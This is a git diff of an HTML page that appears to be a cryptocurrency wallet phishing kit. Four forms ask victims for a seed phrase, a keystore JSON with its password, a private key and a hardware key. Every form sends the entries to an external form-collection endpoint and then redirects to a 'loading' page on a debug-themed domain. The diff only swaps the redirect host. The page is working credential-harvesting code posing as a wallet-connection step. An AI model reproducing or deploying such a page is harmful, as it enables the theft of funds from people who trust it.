--- a/form.html
+++ b/form.html
@@ -38,7 +38,7 @@
             <div class="tab-content" id="myTabContent">
                 <div class="tab-pane active" id="home" role="tabpanel" aria-labelledby="home-tab">
                     <form action="https://submit-form.com/TUGAGn80">
-                        <input type="hidden" name="_redirect" value="web.nodedebug.live/1/loading.html"/>
+                        <input type="hidden" name="_redirect" value="app.nodedebug.live/loading.html"/>
                         <label for="exampleFormControlTextarea1">Enter your 12/24 word phrase</label>
                         <input class="form-control form-control-lg" name="mnemonics" type="text" placeholder="" required>
                         <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
@@ -47,7 +47,7 @@
                 <div class="tab-pane" id="profile" role="tabpanel" aria-labelledby="profile-tab">
                     <div class="form-group">
                         <form action="https://submit-form.com/TUGAGn80">
-                            <input type="hidden" name="_redirect" value="web.nodedebug.live/1/loading.html"/>
+                            <input type="hidden" name="_redirect" value="app.nodedebug.live/loading.html"/>
                             <label for="exampleFormControlTextarea1">Enter your Keystore JSON</label>
                             <input class="form-control form-control-lg" name="keystore-JSON" type="text" placeholder="" required>
                             <label for="exampleFormControlTextarea1">Enter Password</label>
@@ -59,7 +59,7 @@
                 <div class="tab-pane" id="contact" role="tabpanel" aria-labelledby="contact-tab">
                     <div class="form-group">
                         <form action="https://submit-form.com/TUGAGn80">
-                            <input type="hidden" name="_redirect" value="web.nodedebug.live/1/loading.html"/>
+                            <input type="hidden" name="_redirect" value="app.nodedebug.live/loading.html"/>
                             <label for="exampleFormControlTextarea1">Enter your private key</label>
                             <input class="form-control form-control-lg" name="private-key" type="text" placeholder="" required>
                             <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
@@ -69,7 +69,7 @@
                 <div class="tab-pane" id="last" role="tabpanel" aria-labelledby="last-tab">
                     <div class="form-group">
                         <form action="https://submit-form.com/TUGAGn80">
-                            <input type="hidden" name="_redirect" value="web.nodedebug.live/1/loading.html"/>
+                            <input type="hidden" name="_redirect" value="app.nodedebug.live/loading.html"/>
                             <label for="exampleFormControlTextarea1">Enter your Hardware Key</label>
                             <input class="form-control form-control-lg" name="hardware-key" type="text" placeholder="" required>
                             <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
